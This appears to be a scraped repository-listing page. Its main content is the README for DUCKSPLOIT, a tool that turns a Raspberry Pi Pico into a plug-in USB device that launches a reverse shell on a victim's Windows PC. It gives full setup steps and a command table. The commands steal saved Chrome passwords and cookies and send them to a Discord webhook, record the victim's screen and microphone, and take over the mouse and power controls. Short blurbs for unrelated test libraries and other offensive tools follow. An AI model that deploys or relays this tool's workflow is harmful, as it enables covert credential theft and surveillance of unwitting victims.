DUCKSPLOIT - Windows Hacking FrameWork using Reverse Shell

Overview

banner

Ducksploit

Install Ducksploit

Hacker

setup raspberry pico
  1. Download https://github.com/DuckpvpTeam/DUCKSPLOIT/archive/root.zip
  2. Extract downloaded zip file
  3. Go in PICO SETUP folder
  4. Plugg your raspberry pico on your PC with the BOOTSEL button picobootbutton
  5. Move CircuitPython.uf2 file in the E:\ usb port (port of your pico) now your raspberry pico gonna leave usb port and reconnec with CIRCUITPY name
  6. Erase all the content of your raspberry pico and copy 'copy' folder into him
  7. Write myip.txt and write your own IP
  8. Now your raspberry pico is full configured , unplugg your pico and done!
setup ducksploit commands
  1. Download https://github.com/canarddu38/DUCKSPLOIT/archive/root.zip
  2. Extract downloaded zip file
  3. Go in SERVER folder
  4. If python is not installed, launch 'installpython.bat' or download at https://www.python.org/ftp/python/3.8.0/python-3.8.0.exe
  5. Install python requirements using 'installrequirements.bat' script
  6. launch setup.bat ###MUST BE RUN AS ADMINISTRATOR###
  7. Ducksploit is now installed on your PC 😄
  8. Type 'ducksploit' in the cmd
  9. Config your ip using 'ipconfig' (your ip)
  10. Wait victim's connection using 'wait' command
  11. Have fun with ducksploit hacking commands (type help to get commands list)

Victim

Just plugg the raspberry pico in your pc (or hacker can do also) That will start automaticaly the client of the reverse shell

⚠️ Ducksploit is made for legal use or educational use ⚠️

Uninstall Ducksploit

  1. type 'ds uninstall' in cmd
  2. Done 😄

SUPPORT

Donate 👍 using Paypal

Commands

Launch

Command Usage Result
wait wait wait your victim's connection

Config

Command Usage Result
ipconfig ipconfig (your ipv4) config your ip

Account

Command Usage Result
register register reconfigure your account
accountinfo accountinfo view all your account's infos

Exploits

Command Usage Result
stealpwds stealpwds (discord webhook url) steal all saved chrome passwords of your victim and send them into a discord webhook
stealcookies stealcookies (discord webhook url) steal all saved chrome cookies of your victim and send them into a discord webhook
open open (applicationname.exe) open mensioned application
recordscreen recordscreen (time in second) record victim's screen durring amount of time
recordmicro recordmicro (time in second) record victim's micro durring amount of time

Mouse

Command Usage Result
mouseclick mouseclick [left, right, middle] make the victim click the mensionned button
mousemove mousemove (x) (y) move the victim's cursor by x and y pixels
mousescroll mousescroll (int between -1000 and 1000) make the user scroll by int pixels
locatemouse locatemouse get the victim's cursor current locations

Alert Window

Command Usage Result
msg msg [-file, -text] (title) (line1) (line2) create an alertbox and send it on the vitim's pc with a title and 2 lines (if -file set line1 to createfile command content)
createfile createfile (text) set the content of line1 of msg command

Troll

Command Usage Result
skull skull spam cmds with skull and crossbones

Mysc

Command Usage Result
uninstall uninstall uninstall ducksploit
update update update ducksploit
credits credits view ducksploit's credits
exit exit exit from the ducksploit treminal
help help getting the list of all commands
shutdown shutdown make the victim's pc shutdown
reboot reboot make the victim's pc reboot
closesession closesesion make the victim's session close
Owner
We're smart developers , and we work on Windows & android :+1: (DUCKSPLOIT is comming... :hourglass_flowing_sand: )
PacketPy is an open-source solution for stress testing network devices using different testing methods

PacketPy About PacketPy is an open-source solution for stress testing network devices using different testing methods. Currently, there are only two c

4 Sep 22, 2022
Based on the selenium automatic test framework of python, the program crawls the score information of the educational administration system of a unive

whpu_spider 该程序基于python的selenium自动化测试框架,对某高校的教务系统的成绩信息实时爬取,在检测到成绩更新之后,会通过电子邮件的方式,将更新的成绩以文本的方式发送给用户,可以使得用户在不必手动登录教务系统网站时,实时获取成绩更新的信息。 该程序仅供学习交流,不可用于恶意攻

1 Dec 30, 2021
BDD library for the py.test runner

BDD library for the py.test runner pytest-bdd implements a subset of the Gherkin language to enable automating project requirements testing and to fac

pytest-dev 1.1k Jan 09, 2023
Data-Driven Tests for Python Unittest

DDT (Data-Driven Tests) allows you to multiply one test case by running it with different test data, and make it appear as multiple test cases. Instal

424 Nov 28, 2022
DUCKSPLOIT - Windows Hacking FrameWork using Reverse Shell

Ducksploit Install Ducksploit Hacker setup raspberry pico Download https://githu

2 Jan 31, 2022
Local continuous test runner with pytest and watchdog.

pytest-watch -- Continuous pytest runner pytest-watch a zero-config CLI tool that runs pytest, and re-runs it when a file in your project changes. It

Joe Esposito 675 Dec 23, 2022
The source code and slide for my talk about the subject: unittesing in python

PyTest Talk This talk give you some ideals about the purpose of unittest? how to write good unittest? how to use pytest framework? and show you the ba

nguyenlm 3 Jan 18, 2022
Connexion-faker - Auto-generate mocks from your Connexion API using OpenAPI

Connexion Faker Get Started Install With poetry: poetry add connexion-faker # a

Erle Carrara 6 Dec 19, 2022
d4rk Ghost is all in one hacking framework For red team Pentesting

d4rk ghost is all in one Hacking framework For red team Pentesting it contains all modules , information_gathering exploitation + vulnerability scanning + ddos attacks with 12 methods + proxy scraper

d4rk sh4d0w 15 Dec 15, 2022
This repository contnains sample problems with test cases using Cormen-Lib

Cormen Lib Sample Problems Description This repository contnains sample problems with test cases using Cormen-Lib. These problems were made for the pu

Cormen Lib 3 Jun 30, 2022
frwk_51pwn is an open-sourced remote vulnerability testing and proof-of-concept development framework

frwk_51pwn Legal Disclaimer Usage of frwk_51pwn for attacking targets without prior mutual consent is illegal. frwk_51pwn is for security testing purp

51pwn 4 Apr 24, 2022
pytest plugin for testing mypy types, stubs, and plugins

pytest plugin for testing mypy types, stubs, and plugins Installation This package is available on PyPI pip install pytest-mypy-plugins and conda-forg

TypedDjango 74 Dec 31, 2022
Automatically mock your HTTP interactions to simplify and speed up testing

VCR.py 📼 This is a Python version of Ruby's VCR library. Source code https://github.com/kevin1024/vcrpy Documentation https://vcrpy.readthedocs.io/ R

Kevin McCarthy 2.3k Jan 01, 2023
AllPairs is an open source test combinations generator written in Python

AllPairs is an open source test combinations generator written in Python

Robson Agapito Correa 5 Mar 05, 2022
MongoDB panel for the Flask Debug Toolbar

Flask Debug Toolbar MongoDB Panel Info: An extension panel for Rob Hudson's Django Debug Toolbar that adds MongoDB debugging information Author: Harry

Cenk Altı 4 Dec 11, 2019
Auto-hms-action - Automation of NU Health Management System

🦾 Automation of NU Health Management System 🤖 長崎大学 健康管理システムの自動化 🏯 Usage / 使い方

k5-mot 3 Mar 04, 2022
How to Create a YouTube Bot that Increases Views using Python Programming Language

YouTube-Bot-in-Python-Selenium How to Create a YouTube Bot that Increases Views using Python Programming Language. The app is for educational purpose

Edna 14 Jan 03, 2023
User-oriented Web UI browser tests in Python

Selene - User-oriented Web UI browser tests in Python (Selenide port) Main features: User-oriented API for Selenium Webdriver (code like speak common

Iakiv Kramarenko 575 Jan 02, 2023
Android automation project with pytest+appium

Android automation project with pytest+appium

1 Oct 28, 2021
A single module to link Python ecosystem to the Web

A single module to link Python ecosystem to the Web. Have a quick look at the Gallery first to get convinced ! FAQ For any questions, please use Stack

66 Dec 21, 2022